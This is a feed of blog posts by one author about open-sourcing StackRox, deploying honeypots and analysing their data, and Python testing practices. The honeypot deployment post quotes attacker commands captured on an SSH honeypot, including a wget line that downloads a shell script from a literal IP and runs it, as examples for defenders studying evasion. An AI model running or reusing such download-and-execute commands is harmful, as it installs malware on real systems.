DEV Community: Mat

How to Open Source Your Project

Mat — Tue, 02 Aug 2022 12:57:48 +0000

On April 1 2022, the release of the StackRox Community Platform was announced. This is the result of a great deal of work by our team to transition StackRox’s proprietary security platform into an open source one.
I've been working behind the scenes and want to share a bit of insight into the challenges that bigger projects might face when opening up.

Transitioning a project from private to public development means more than just changing the visibility of the GitHub repositories. It is essential to have a transition plan, especially if the goal is to build a thriving community where users can grow and leverage the platform.

To have the best chance of success, the project’s goals and the community’s goals should be as aligned as possible.

For the StackRox team, one of our top goals was to set the entry barrier as low as possible for contributors and community users. I’ve personally found this to be a significant challenge.

It is one thing to tailor your environment to engineers, hoping to provide a thorough and guided onboarding experience. Creating a forum for a greater community of developers, operational and security folks poses an entirely different challenge.

Part I: Your Product and Your Engineering Team

What Do We Open Source?

If you look at the StackRox GitHub organization, you will find a multitude of repositories with the platform comprising many different components and features that could be kept private. However, we chose to be thorough and take the extra time. We decided to open the complete platform and all its dependencies, including our out-of-the-box policy ruleset that we ship on new installations, prebuilt Docker images, and Helm charts to make the open source deployment as easy as possible.

What License Do We Use?

When opening your source code, the first task should be to select a license that fits your use case. In most cases, it is advisable to include your legal department in this discussion, and GitHub has many great resources to help you with this process. For StackRox, we oriented ourselves on similar Red Hat and popular open source projects and picked Apache 2.0 where possible.

How Can People Access It?

After you’ve decided on what parts you open up and how you will open them, the next question is, how will you make this available?

Besides the source code itself, for StackRox, there are also Docker images, as mentioned. That means we also open the CI process to the public. For that to happen, I highly recommend you review your CI process. Assume that any insecure configuration will be used against you. Review common patterns for internal CI processes like credentials, service accounts, deployment keys or storage access.

Also, it should be abundantly clear who can trigger CI runs, as your CI credits/resources are usually quite limited, and CI integrations have been known to run cryptominers or other harmful software.

How Do We Manage It?

StackRox is built as an upstream public build, whereas Red Hat Advanced Cluster Security (RHACS) is built on an internal Red Hat build system. Tending to two different build pipelines naturally brings some overhead, as the open source and commercial flavors of this project each have different needs.

If all goes well and your CI succeeds, you will most likely end up with some artifact — a release binary, tgz file or Docker image, which raises the next qestion:

How Do We Distribute It?

Making these artifacts publicly available to lower the barrier of entry is essential.

For StackRox, we decided to push built images to a public organization at Quay. Alternatively, you can use GitHub’s release feature or other public distribution channels, depending on your release artifact type, such as NPM, PyPI, or Crates. After distribution, the next step would be users downloading these artifacts and running your product. This brings us to the next important question.

How Do We Document It?

The project documentation is your public representation of your project, inviting users and contributors alike. Potential users will often consult your documentation first to gauge whether your project fits their use case and understand how to use it most efficiently. Documentation is ideally written to convey information to the community while minimizing user confusion and clarifying issues in your GitHub repository.

Remember that documentation for operators and developers are two very different things.

For example:

Operators are interested in the deployment, configuration, platform maintenance, data preservation, updates and disaster recovery.
Developers are interested in setting up a development environment (IDE, local deployment, debug builds, etc.) and getting access to detailed API descriptions.

Both target audiences profit heavily from “Getting Started” guides, be it how to get your first deployment up and running (operators), or how you accomplish everyday extension tasks in the codebase (developers).

Because StackRox is upstream of RHACS, we decided to focus our documentation efforts on developers, as quite a lot of user-tailored documentation is available. Open source-specific user documentation with StackRox branding is a project we’re planning right now, though.

Our developer-tailored documentation is being expanded in the main projects’ README and stackrox/dev-docs. The latter is a collection of Markdown guides that initially started as private Confluence articles. This collection keeps growing, especially as we get more feedback from contributors on which guides they would like to see. It is also a continued effort to migrate additional guides and how-tos that might have been missed in the first migration, or that might not have been published because they contain private information.

How Do We Manage Privacy?

Speaking of private information: Due to the nature of git, the complete history of your project will be public, starting with the first commit to the repository you publish. This also applies to any issues, discussions and pull requests that your project collected over time. While this is a nonissue for internal development, this can pose quite a problem when going public.

It is heavily advised that you review all your issues and comments — on GitHub or other git repositories — and scrape the project’s git history, PRs, and Issues for any information or references not intended for public use.

This information does not need to be public to be considered open source, but it does add context for future users and your own devs, so you might want to keep as much of it intact as possible.

A quick and easy way is to start with a new project on GitHub and do away with your git history. This poses multiple problems, however.

Your engineering team loses the history of their work, problem-solving and discussions, which are valuable resources. Furthermore, this step has to be planned well, and the engineering team must be in the know — if one person pushes their old git history to your new project, the complete history will be accessible again.

How Do We Handle CVEs?

Speaking of visibility: If you handle CVE/embargoed work, you will need a workflow in place. As your repository is public, you cannot simply use a public feature branch for this kind of work. For example, GitHub provides the option of temporary private forks to resolve security issues.

How Do We Take Care of Our People?

Last but not least: As already mentioned, in all of these tasks, you should take care to keep your engineering team involved and in the know at all times.

The Red Hat Advanced Cluster Security (RHACS) engineering team works in a design-document-driven process, where all major changes are discussed between the whole engineering team through shared documents and discussions, written (document comments) and spoken (review meetings).

In the months leading to our announcement, we conducted many discussions and tried to find solutions, workflows and approaches that the team was happy with.

As the engineering team will still be the main driver for the project, they should know what changes in their daily work once you go open

Additionally, this is an excellent opportunity for initial external OSS contributions. If you maintain private forks with product-specific patches, this is the chance to shine by offering these changes to the original upstream projects.

For our engineers, little changed. They still work primarily in the upstream repositories, with the main difference that all pull requests and their discussions are now publicly visible. This change means that teams need to be mindful of how they communicate, even internally, as all comments can be read by external people who might lack the context or shared humor your team has.

Part II: Community, Collaboration, Context

How Do We Enable Healthy Discussion?

As your audience grows, it is vital that you define clear rules to create a safe environment for everyone to participate. A common way of doing this is to define a code of conduct (CoC), which sets some basic guidelines on what kind of community interaction will not be tolerated. We decided to stick to well-established frameworks and based our CoC on the Contributor Covenant.

How Do We Help Keep the Discussion Healthy?

The best CoC definition doesn’t help if there is no one there to enforce it. This meant we needed to find volunteers for a CoC committee and train them accordingly. The committee members should be publicly available and open for communication so they can be approached in case of any problems.

We did this by publishing the CoC and the committee members on our community website.

As your audience grows, it is vital that you define clear rules to create a safe environment for everyone to participate.

Where Can We Communicate with the Community?

At this point, you should be aware of the goal of your open source go-live and the expected target audience. Answers to these questions shape how you interact with your community. Use all channels you have to reach out, but decide on one discussion medium out of the plethora available today, such as Slack, Discord, mailing list, forums or Matrix.

The StackRox community currently lives on the CNCF Slack workspace in the channel #stackrox.

How Do We Accept Contributions?

Be clear and concise in what you accept from contributors. Is it only feedback in discussions? Do you accept issues or pull requests on GitHub? If so, it is recommended to provide guidelines in the form of a CONTRIBUTING.md document or Issue/PR templates to fill out.

If you decide to accept these, it also helps to give people a rough idea of your reaction times. Also, be sure to have processes in place to decide who keeps an eye on new items.

For example, we communicate that we aim to triage new issues and PRs within a week, with more detailed discussions and decisions communicated in our monthly meetings.

How Will We Meet with the Community?

Regular public meetings lower the bar for participation and allow for issues to be raised efficiently. Any interested contributors can quickly stop by and get in touch with your project.

Currently, we run our StackRox Community meeting on the second Tuesday of each month at 9 a.m. PST, 12 p.m. EST, 5 p.m. GMT. You can subscribe to the events by adding the calendar community@stackrox.com to your calendar.

In these meetings, we discuss and show demos of upcoming features, talk about open issues, present guides and how-tos, and have an open forum for Q&A with the community.

Part III: Your Turn

Over the past year and a half, we have worked diligently to create a completely open source Kubernetes security platform. The next step for us is to help harden as many container workloads as possible. To accomplish this goal, we need feedback from users. We would love to see you in our Slack channel, starring the GitHub repository and becoming our monthly “RoxStar.”

If you have any questions or would like to contribute to StackRox, stop by in the CNCF Slack or join the next community meeting!

Honeypot Data Visualization & Automation

Mat — Fri, 05 Mar 2021 16:54:23 +0000

This is the final part of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots.

An extended version of this article and an according talk can be found at Virus Bulletin 2020.

After successful installation and customization, the deployed Honeypots start generating data. One of the main challenges at this stage is sighting the logs and finding interesting events. Humans aren't good at sighting big chunks of text; most people can grasp graphics much more quicky.

Hence, having dashboards is a good way of getting a quick overview of what's happening.

Sighting Data

The current state of our deployment is this: Logs over logs over logs.

As logs are not tailored for human consumption, they are notoriously hard to read and check. This is where visualizations come into play. The author recommends ingesting logs into a central system like Elastic or Splunk that indexes the generated data.

Besides making all log data available for Dashboards, it also adds the advantage of making logs of all deployed Honeypots of your whole infrastructure available on a central system. This enables dashboard and report generation across the whole infrastructure and deeper insights.

For the remainder of this paper it is assumed that all logs are collected in a central Splunk instance, which is also used for the shown dashboards.
Some key metrics the authors find useful for daily work are:

Connecting Source IP
Number of different Source IPs in the last 60 minutes
Top 10 connection counts by Source IP
Username / Password pairs (failed & successful)
SHA256 hashes of captured payloads
List of executed commands (depending on Honeypot)
Unique connection identifiers (i.e. SSH keys or client version strings)

Using Dashboards is no turnkey solution to better insights into produced log data. It lies still in the responsibility of the user to clean up data first before plotting it. In this context it is viable to consider lending common dataset preparation procedures from the area of Machine Learning. Some pointers can be the need for deduplication of events, i.e. multiple connections from the same source IP. Whilst in some scenarios this can be interesting, i.e. to find credential stuffing attacks, it can be counterproductive in others, like the absolute count of unique connections in a given timeframe.

Above screenshot shows an example for noise in a dashboard. The file /tmp/up.txt is generated with different content but is always written to the same path. While itself part of an evasion technique, it also fills up dashboards that show the latest found payloads. This is where filtering can help to keep dashboards effective by lowering noise. After validating that the created file is indeed noise, it can be filtered by its path. Nevertheless, the contents of this file might change as well as its importance. With the filter in place, this change might be overlooked easily. Therefore, continuous data analysis and pattern recognition are required to keep a dashboard valuable and usable.

Automating Workflows

At this point the infrastructure consists of several running Honeypots that are producing data, which in turn is sent to a Splunk instance for indexing and dashboard generation.
Having a static dashboard with basic metrics is helpful for getting a grasp on the state of the infrastructure. If Honeypots are used in a more active scenario, i.e. for Threat Hunting, it is favourable to add common lookups and shortcuts to a dashboard to improve initial triage times. The proposed Splunk dashboard therefore contains contextual links to VirusTotal, Shodan and GreyNoise.

All encountered SHA256 hashes are direct links to VirusTotal searches, clickable IP addresses refer to Shodan and Autonomous System Numbers (ASNs) are used as a lookup for GreyNoise. These services should provide enough information to decide whether a detailed investigation could lead to interesting insights.

To further decrease the number of manual tasks, one can also consider the usage of Threat Intelligence Platforms like MISP which offer automated enrichment and analysis capabilities for submitted samples. Most Honeypots either already have API capabilities to upload Payloads to a target server or can be retrofitted to do so with little effort. In the showcased infrastructure, Cowrie is configured to query a MISP instance for the SHA256 hash of every encountered payload. If the payload is unknown, a new case is created in MISP and the payload is attached to it. If it was encountered before, a “sighting” event is added to the according case.

The advantage of platforms like MISP is the community aspect and the integrated enrichment capabilities that can give samples and payloads context, IOCs, and analyses of other members of a sharing group. In the presented architecture, this role is fulfilled by a tandem of MISP and TheHive. TheHive is another TIP that focuses more on external integrations and analyzers. In its current state, every encountered payload is uploaded to MISP, followed by an automated case creation in TheHive. This enables analysts to run analyzers with little additional overhead, as they do not need to create case files and upload samples by themselves.

This area of the proposed architecture can also be carried out by a Security Orchestration, Automated Response (SOAR) system to further automate responses and increase analytic capabilities.

Example Workflow

To illustrate the described system integration and workflows, we assume a file was uploaded to one of the Cowrie SSH Honeypots with the SHA256 hash of 69787a2a5d2e29e44ca372a6c6de09d52ae2ae46d4dda18bf0ee81c07e6e921d. As a first measure of interest, this file can be investigated in the Splunk dashboard:

The dashboard already provides some valuable information on first sight. It can be derived that the payload was uploaded using the default credentials for a Raspberry Pi and the connecting address was located to Switzerland. By clicking on the hash or the IP address, either VirusTotal or Shodan can be checked for initial information. Last but not least, a click on the ASN leads to a GreyNoise query that lists all known systems in this ASN. This can add context to the IP as it gives pointers if the ASN is notoriously known for malicious traffic.

After this cursory glance it is decided to further investigate this sample. Based on the information provided by Shodan and VirusTotal, the current working hypothesis is that this is a Bash IRC bot distributed by a system with a Raspberry PI SSH version string.

As the payload was dropped on an integrated SSH honeypot, it has already been uploaded to a connected MISP instance where a new case has been created (or, in the case the payload already exists, a sighting has been added). The event already has the uploaded file attached as a malware sample including some additional metadata like common file hashes, the size in bytes and the entropy. From here on out, it is possible to make use of the MISP ecosystem to share and enrich encountered samples, for example through MISP Communities or MISP Community Feeds, as well as MISP plugins that integrate it with other products.

While the community aspect of MISP is its strong suit, there are other contenders regarding the effective use of integrations to 3rd party products. The tandem of The Hive and Cortex is an alternative that focuses more on said integrations. It consists of one or multiple Cortex instances that are responsible for running so called analyzers which are making use of several external services like IBM X-Force, RiskIQ Passivetotal, or HaveIbeenpwned. This is complemented by The Hive, which in turn offers case management, intel collection and templating capabilities.

Additionally, MISP and The Hive can work in two-way-synchronization mode, which unites the strengths of both platforms into an excellent solution for managing, tracking, and optimizing investigations. For the example at hand this means that an incoming Alert for the discovered IRC bot is awaiting its import as a case in The Hive.

The payload and all its observables from MISP are imported and available for use in Cortex analyzers. As these are run, they generate additional observables and reports that can be added to the case at hand, as can be seen in the screenshot. The red tags attached to the hash and the file stem from critical results obtained by querying IBM X-Force and VirusTotal. All added metadata can also be synced back to MISP for integrity and sharing purposes.

At this point, an upload has been found and without opening the file itself, a preliminary examination was conducted which lead to the decision to further investigate the incident. The file was added to MISP and The Hive with minimal to no user interaction and made available to enrichment plugins and communities, therefore accelerating and improving the process of manual analysis and investigation.

Conclusions

Successfully deploying and integrating Honeypots and supporting software into an existing infrastructure can be a daunting task that requires a decent amount of planning. Nevertheless, the advantages are evident:

If integrated correctly, Honeypots enable faster alerting and a pre-emptive view into current attack strategies and automated attacks against publicly available infrastructure, whilst supporting integrations based on TIPs like MISP or The Hive speed up and improve the quality of Triaging and lower the amount of manual work done by Analysts. Combined with widespread log collection and well-designed Dashboards, this compliments better defensive strategies and measures against novel attacks.

Especially with the continuous popularity of container-based virtualization technologies, high-interaction Honeypots are expected to gain popularity and development traction. As it stands, this type of Honeypots is considerably harder to detect, which makes it prone for usage in internet-facing deployments. This is due to the fact that the architecture mitigates most of commonly used evasion techniques simply by being a fully custom system that behaves consistently and as close to a real system as possible.

Once deployed, Honeypots are a low maintenance asset that can bring high value to the table, be it as a pre-emptive alerting system for internal infrastructure or as a sensor for discovering ongoing campaigns and credential stuffing attacks, collecting value intelligence without manual interaction.

This concludes the series on honeypots. As a closing note, some resources can be recommended for getting started with custom deployments.

A good overview of common resources and projects is the repo awesome-honeypots which can be of great service if a specific service or system is needed.

First and foremost, an All-in-One solution that bundles multiple Honeypots with an Elastic stack, custom dashboards and a multitude of tools exist that is named T-Pot. This project is developed by Telekom Security and offers a quick start for the price of customization. As the project is rather complex and relies heavily on containers, customization of the bundled Honeypots is not as straightforward as it is in custom deployments. Nevertheless, it is an excellent starting point to get a feeling for deployments.

A step closer to fully customized Honeypots are frameworks that abstract shared functionality between specific implementations. Examples are DutchSecs honeytrap and Cymetrias honeycomb. Frameworks can speed up the development process of custom Honeypots but come with the price of predefined structure, as Frameworks rely heavily on conventions to work correctly.

With the release of this paper, the presented Splunk dashboards are made available for general use and can be found in this repository. This organization also holds repositories with the custom developed SMTP Honeypot mailhon as well as an IP Camera Honeypot, CameraObscura. Finally, the last project that is used in the demonstrated environment is an Android Debug Bridge Honeypot by the name of ADBHoney.

Last but not least, Honeynet has to be named as a central research organization that is dedicated to continued development of Honeypots as well as investigations into ongoing attacks.

Honeypot Deployment and Customization

Mat — Tue, 24 Nov 2020 18:54:10 +0000

This is part 2 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots.

An extended version of this article and an according talk can be found at Virus Bulletin 2020.

The first step to data collection, which is also the most important one, is the deployment of Honeypots. There are multiple pitfalls and recommendations to consider depending on the use case. After a successful deployment, the next step is to collect generated data and possible payloads at a single data sink to enable metrics generation and monitoring of the complete infrastructure.

Deployment Considerations

There are two main scenarios to consider when deploying Honeypots: Internal versus internet facing deployments. Both are valid scenarios but cover different use cases. For the remainder of this paper, we focus on internet-facing deployments for data collection if not further defined.
In an internal deployment, Honeypots can be considered as traps or alert systems. The idea is to deploy them throughout the company infrastructure, preferably near production servers. If an attacker is looking for a foothold in a network, they stumble upon these strategically placed systems and try to use them to persist access. Ideally, these Honeypots have been set up to raise alarms if incoming connections are detected, as there is no legit use for them in daily operations. This scenario can support existing measures like Intrusion Detection Systems or log monitoring as an active component to increase chances of early detection of intruders.

Internet facing deployments on the other hand are more tailored towards collecting data on widespread attacks. This can range from basic information like attacked services (i.e. how common are attacks versus Android Debug Bridges) or used credentials up to detailed TTP information (i.e. which commands/scripts are executed, attempted lateral movement, persistency techniques and possible evasion attempts). In contrast to internal deployments, these are constantly exposed to world-wide traffic. Therefore, they are always to be considered compromised. As these deployments aim to provide no direct protection to an internal network, it is advisable to isolate internet facing Honeypots completely from production infrastructure.

Besides these specifics, we can also derive some general recommendations for all deployment scenarios.

As these systems are considered insecure by design, it is advisable to treat them accordingly. Leaving production data or company information on them is inadvisable, as well as reusing usernames, passwords, certificates, and SSH keys. If attackers manage to escape from the Honeypot to the hosting OS, they are otherwise able to gain valuable information about internal infrastructure and active usernames.

Furthermore, it is strongly advised to run Honeypot services as a non-root user that has minimal permissions and is not able to use sudo. In the case of Honeypot escapes this makes it considerably harder for attackers to escalate privileges. As most emulated services are running in the range of system ports which require elevated privileges, it is prudent to run them on non-system ports and utilize iptables forwarding rules to make them look like they are running on the system port.

If Honeypots for common services like SSH and FTP are deployed, they should be running on the services’ default port. Especially for SSH as means of access for most systems, it is recommended to disable password authentication and root login for the real SSH server, as well as running it on a non-standard port to free up port 22 for the Honeypot. This also means that the creation of an SSH alias in local configs is recommended to avoid connecting to the SSH Honeypot by accident when conducting maintenance or applying configuration changes.

Another consideration is the hosting service for the infrastructure. If it is not hosted on company-owned infrastructure, the idea of using a low-end VPS provider is compelling. Unfortunately, these are prone to being shut down in context of deadpooling scams, so it pays to be prepared to loose these systems at any time. In general, automated deployments based on tools like Ansible or Puppet should be used for reproducible results and lower the risk of misconfigurations. Combined with a backup strategy for collected data, logs, and payloads this ensures resilience to data loss.

Furthermore, it is recommended to minimize the usage of OS-based resources for the specific requirements of Honeypots. For example, the usage of local virtual environments for Python-based projects should be considered over using system-wide package installations to avoid dependency problems with multiple projects running on the same language or OS updates that break dependencies.

Regarding operation, it is also advisable to monitor the regular operation of deployed Honeypots including storage utilization, ideally with automated tests tailored to the respective protocol.

Generally speaking, you’re exposing a system to the world that looks vulnerable - it most likely is vulnerable, but in other ways than you’d think. Honeypot deployments, especially when internet facing, are an asymmetrical playing field with an attacker advantage. They have infinite ways and time to try attacks – the operator needs to conduct one mistake to expose the Honeypot host and possibly the surrounding network to attacks.

Besides the deployment, there are more things to take into consideration. Attackers constantly try to detect Honeypots – with various techniques and varying success rates. A talk detailing finding flaws and their implications was held at 32c3. In the upcoming section, some commonly encountered detection techniques and possible workarounds are presented. These are merely pointers in the right direction. It is advisable to monitor your Honeypot infrastructure constantly and keep an eye out for disconnects always happening after specific commands or workflows, as these can point to evasion strategies.

Custom Configurations

Many Honeypots come with a default set of emulated parameters – including Hostname, service version, and credentials. This is especially common in low and medium interaction Honeypots. In the context of Honeypot configurations, customization is the key to evasion mitigation.

As an example, the SSH Honeypot Cowrie is considered. If the default configuration is not changed, it used to accept the user Richard with the password fout, afterwards announcing that its system name is svr04. Checking for default configurations like these is relatively easy and therefore happens quite a lot.

As a preventive measure, the footprint of the Honeypot should be as custom as possible. Especially announced hostnames, service versions and banners are low hanging fruit that can be changed. For low and medium interaction Honeypots it can also be a valid strategy to change outputs of emulated commands and create custom filesystem pickles to further make the system unique.

Finding evasion tactics

As a general recommendation, monitor your Honeypots closely, especially in the early days of deployment, as they are "fresh" and unknown at this point. To stay on the example of Cowrie, it is possible to spot evasion techniques quite easily in the generated logs. In all cases the command workflow on the system is the same up until a specific point where commands either fail or are not executed at all. A commonly observed pattern of actors on the Cowrie SSH Honeypot is to echo the raw script into a file and trying to execute it subsequently.

user@pot:~$ /bin/busybox echo -en '\x00\x00\x00\x00\xb4\x03\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> retrieve
user@pot:~$ ./retrieve

This does not work on most low and medium interaction Honeypots, as they disown files created by the connected SSH user as soon as possible. As these files are now non-existent, the workflow of echoing the initial payload into a file and executing said file afterwards does not work on these Honeypots, therefore it can be considered a successful evasion.
Another evasion technique commonly encountered is to download the payload and execute it in a second command. As discussed, this approach leads to a successful evasion, as the file is not available to the user anymore at time of execution.

user@pot:~$ cd /; wget http://45.148.10.175/bins.sh; chmod 777 bins.sh; sh bins.sh;

There are not many mitigations available to these issues. Due to the very nature of low and medium interaction Honeypots, the most viable mitigation is to switch to a high interaction system. High interaction Honeypots present a complete, persistent environment to an incoming connection that often is cached even through reconnects. This means that all dropped or downloaded payloads are available for execution instead of being snatched away by the Honeypot.

Sanity Checks

Sanity checks are also encountered quite often. As an initial example an SMTP Honeypot is considered. Attackers will try to connect to a mail server and send a test mail to their own infrastructure to check if the mail server is allowing outbound mail traffic.

{
  "timestamp": "2020-06-14T08:57:00.854855",
  "src_ip": "0.0.0.0", "src_port": 54282, "eventid": "mailhon.data",
  "envelope_from": "spam@provider.com", "envelope_to": ["spam@provider.com "],
   "envelope_data": "From: spam@provider.com\r\nSubject: 42.42.42.42\r\n
        To: spam@provider.com\r\nDate: Sat, 13 Jun 2020 23:56:59 -0700\r\nX-Priority: 3\r\n"
}

A possible mitigation is to allow the first mail from every connection to leave the honeypot. Be advised that this bears legal implications as the system is technically sending out spam.

Besides the fully-fledged production test there are other sanity checks that can be observed. As a general guideline, deployed Honeypots should expose a configuration and sizing that is similar to their real-world counterparts. This can be archived more easily on low and medium interaction HPs as they often emulate commands by looking up text files which massively eases the spoofing of cluster states, replica configurations or even filesystem sizes.

Conclusion

As one can see, there is a lot to consider and check when deploying Honeypots. But don't fret - the work definitely pays off. It is very interesting to watch in realtime what is happening on your systems. But looking at logs isn't that much fun, so join me in the next part for details on sighting and visualizing data!

My Python Testing Best Practices

Mat — Mon, 31 Aug 2020 17:28:27 +0000

As someone who has been using Python professionally in the younger past, I found some best practices regarding testing and project setup that work well for me. Today I'd like to share them with you.

TL;DR: The repo containing demo code: Maddosaurus/pytest-practice.

Project Setup

The project setup is based on Kenneth Reitz' Hitchhiker's Guide To Python. It follows the idea of a seperate module accompanied by tests and supporting info on the same level (i.e. not contained in the module itself). This keeps the module lean and small.

# Module containing the code
pytdemo/pytdemo.py
pytdemo/util.py
# Testsuite
tests/conftest.py
tests/test_pytdemo.py
tests/test_util.py
# Supporting information
.gitignore
LICENSE
README.md
requirements.txt
setup.py

As one can see, the module itself only contains the bare essentials. The test suite is organized to roughly match the submodules, but this is an idea I only use for smaller modules. If submodules get larger and more complex, I tend to group tests by behaviour or logical groups.

Test Setup

Personally, I'm using a wild mixture of pytest, unittest.mock.MagicMock and requests-mock - the last one only if the module is using requests directly to interact with REST APIs.

As a general recommendation, you should monitor your test coverage. To do that, I like to use pytest-cov, which is a powerful tool that can generate nice reports with the --cov-report html option.

A word of caution: Aiming for 100% coverage is a great thing to do, but don't try to enforce it. This can end up being extremely tedious and sometimes impossible. Try to find smart goals instead, i.e. agreeing on covering all functionally important parts of your project.

The conftest File

You might have noticed that there is a conftest.py living in the tests folder. This file is used to store shared pytest fixtures that can be used in all test files. This is highly recommended, especially for helper functions and data sources.

In the example code you will find a fixture here that creates a custom instance of the main module which contains an URL that is pointing to localhost. This is to ensure that even if your mocked endpoints don't catch every call, you'll be the first to know (and also, we're avoiding hitting the real service with test-based requests).

Patching Monkeys

There is one problem when writing tests: You want to test as small and free of side effects as possible. This can be achieved by mocking away all calls to other functions the subject under test (SUT) is calling. Pytest does this by providing multiple mechanisms with monkeypatch being my favourite for its balance between readability and explicitness.

As an example:

def test_get_all_URL(crt_mock, monkeypatch):
    # Set up a mock that will replace the requests module in CrtSh and use it
    # The MagicMock class comes in handy as it does a lot in the background for us.
    requests_mock = MagicMock()
    monkeypatch.setattr(pytdemo.requests, "get", requests_mock)

    crt_mock.get_all("testhost.domain")

    # Check it the requests module was called with the correct URL
    requests_mock.assert_called_once_with(
        "https://test.local/",
        params={"Identity": "testhost.domain", "output": "json"}
    )

In the example the get function of requests is replaced with a custom MagicMock object which will save every call to it.

As you can see, the test is divided into three parts:

Arrange - Set up all required vars, data and mocks
Act - Call the SUT
Assert - Checking the result for correctness

This threefold structure improves readability - conventions often help to make your job as a team easier. It is actually a well known pattern called AAA - Arrange, Act, Assert and I recommend reading a bit more about it if you're interested in writing better Unit Tests.

As you can see, combining different Python tools for testing can yield a very powerful setup that allows you to build your tests quick and easy.

Final Thoughts

I'm merely scratching the surface with this post. There are many more modules and best practices I'd like to share over time that easen your life as a Python dev.

For now, keep in mind that testing might feel it is slowing you down but in fact ensures that you keep your current speed. Writing good Unit Tests ensures that all the parts in your module work as intended and keep working as intended - even when you're changing and refactoring the code. This also means that you should run your tests often, so please make sure that they execute as fast as possible.

Finally, maybe the most important tests you'll write are the ones that are created in the context of a bug ticket:

Try reproducing the bug with a Unit Test first before attempting to fix it. With this order of operations you ensure that the bug is fixed and that it won't come back at a later stage, so get testing!

What are Honeypots and why do I want them?

Mat — Fri, 19 Jun 2020 08:59:27 +0000

Honeypots can provide valuable insights into the threat landscape, both in the open internet as well as your internal network. Deploying them right is not always straightforward, just like interpreting any activity on them.

This is part 1 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots.
An extended version of this article and an according talk can be found at Virus Bulletin 2020.

As attacks on internet-facing infrastructure shifted to being mostly automated in recent years, Honeypots lost some of their meaning in detecting novel exploits and attacks on said infrastructure. Combined with the fact that the people running Honeypots usually don’t want to give away details on how they customized them to keep them from being detected, this leads to a situation where the value of running them got upstaged. Although the means of operation of attackers has changed, Honeypots still allow valuable insights into ongoing campaigns, used credentials and distributed payloads.

To uderstand what value Honeypots bring to the table, it is imperative to know, what they are used for.

Basically, Honeypots mimic systems that look vulnerable and therefore are valuable targets for attacks. This can either be a vulnerable looking service (i.e. SSH, Elastic) or client (i.e. Browsers).

The latter emulates a browser to find websites that for example try to execute malicious payloads on clients, like JavaScript Cryptominers or Drive-By-Downloads.
The former emulates a complete server or protocol to find tools, techniques and procedures used by malicious actors. Such Honeypots can be used to uncover for example attacks tailored to overtake publicly accessible IoT devices or ransom unsecured MongoDB instances.

Server-side Honeypots can further be grouped into three categories based on the level of emulation they provide: Low, Medium and High Interaction Honeypots.
Low interaction Honeypots are rather easy to build, as they often emulate only the basic commands of a protocol. For SSH, a low interaction HP can consist only of the login dialog to collect usernames and passwords potentially used in credential stuffing attacks.

Medium interaction Honeypots take this principle a step further and emulate more commands and part of the surrounding system. As an example, the medium interaction HP Cowrie emulates a complete filesystem as well as many integrated system commands like lsof or netstat to look like a fully running system.

Finally, high interaction Honeypots represent a fully functioning implementation of the protocol in question, often made available through a Man-in-the-Middle (MitM) proxy which logs every interaction with the HP. For SSH this is represented by Dockpot, which is a HP that is running a full Linux system in an image, exposing the SSH connection through a MitM proxy that logs all interactions and issued commands. For every connection from a distinct source IP, a new container will be created and kept until a timeout is reached. This not only enabled connection separation but also persistency across connections, as the attacker finds the filesystem with all changes and additions that were conducted during the first connection.
All three groups have their advantages and use cases. While detail and insight grow from using low to high interaction Honeypots, the error potential, attack surface, hardware demand and general complexity increase as well.

Low and Medium interaction HPs are often developed as scripts being run by an interpreter, i.e. Python. While they provide limited insight and are relatively easy to detect, they can be installed on virtually any OS that is able to run a fitting Python distribution. This could be anything ranging from a Raspberry Pi up to fully fledged standalone Hardware or cloud deployments.

High interaction HPs are often based on virtualization or containerization technologies and require a more advanced setup. This includes using sufficiently powerful hardware, configuring the abstraction layer, and setting up VMs or containers.

Therefore, goals, budget, and time constraints should be known before deciding which Honeypot will be deployed.